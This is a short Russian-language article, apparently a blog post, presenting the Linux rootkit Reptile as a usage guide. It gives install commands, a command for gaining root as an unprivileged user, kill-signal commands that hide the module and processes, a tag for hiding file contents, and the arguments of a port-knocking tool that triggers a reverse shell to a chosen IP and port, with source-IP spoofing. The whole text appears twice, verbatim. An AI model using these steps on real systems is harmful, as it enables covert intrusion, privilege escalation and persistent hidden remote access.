Приветствую! В этой статье, речь пойдет о rootkit для Linux систем, под именем Reptile.
Rootkit — набор программных средств, обеспечивающих:
· маскировку объектов (процессов, файлов, директорий, драйверов);
· управление (событиями, происходящими в системе);
· сбор данных (параметров системы).
Особенности Reptile:
· Root-права не привилегированным пользователям
· Сокрытие файлов и каталогов
· Сокрытие содержимого файлов
· Сокрытие процессов
· Собственная маскировка
· Сохранение загрузок
· ICMP / UDP port-knocking backdoor.
Установка:
> apt-get install linux-headers-$(uname -r)
> https://github.com/f0rb1dd3n/Reptile.git
> cd Reptile
> ./installer.sh install
Бинарные файлы будут скопированы в папку /reptile, которая будет скрыта с помощью Reptile.
Получение root прав:
> /reptile/r00t
> Id
Использовалась следующая ОС:
Скрытность Рептилии:
· Скрыть / показать модуль: kill -50 0
· Скрыть / показать процесс: kill -49 <PID>
· Скрыть содержимое файлов: весь контент между тегами будет скрыт.
> #<reptile>
> content to hide
> #</reptile>
Port Knocking к хосту с Рептилией:
> ./knock_on_heaven <args>
Аргументы:
· -x protocol (ICMP/UDP)
· -s Source IP address (You can spoof)
· -t Target IP address
· -p Source Port
· -q Target Port
· -d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"
· -l Launch listener
Конец, спасибо за внимание.
P.S. Дополнительная информация:
> https://github.com/f0rb1dd3n/Reptile
Спасибо, за внимание.
Rootkit — набор программных средств, обеспечивающих:
· маскировку объектов (процессов, файлов, директорий, драйверов);
· управление (событиями, происходящими в системе);
· сбор данных (параметров системы).
Особенности Reptile:
· Root-права не привилегированным пользователям
· Сокрытие файлов и каталогов
· Сокрытие содержимого файлов
· Сокрытие процессов
· Собственная маскировка
· Сохранение загрузок
· ICMP / UDP port-knocking backdoor.
Установка:
> apt-get install linux-headers-$(uname -r)
> https://github.com/f0rb1dd3n/Reptile.git
> cd Reptile
> ./installer.sh install
Бинарные файлы будут скопированы в папку /reptile, которая будет скрыта с помощью Reptile.
Получение root прав:
> /reptile/r00t
> Id
Использовалась следующая ОС:
Скрытность Рептилии:
· Скрыть / показать модуль: kill -50 0
· Скрыть / показать процесс: kill -49 <PID>
· Скрыть содержимое файлов: весь контент между тегами будет скрыт.
> #<reptile>
> content to hide
> #</reptile>
Port Knocking к хосту с Рептилией:
> ./knock_on_heaven <args>
Аргументы:
· -x protocol (ICMP/UDP)
· -s Source IP address (You can spoof)
· -t Target IP address
· -p Source Port
· -q Target Port
· -d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"
· -l Launch listener
Конец, спасибо за внимание.
P.S. Дополнительная информация:
> https://github.com/f0rb1dd3n/Reptile
Спасибо, за внимание.
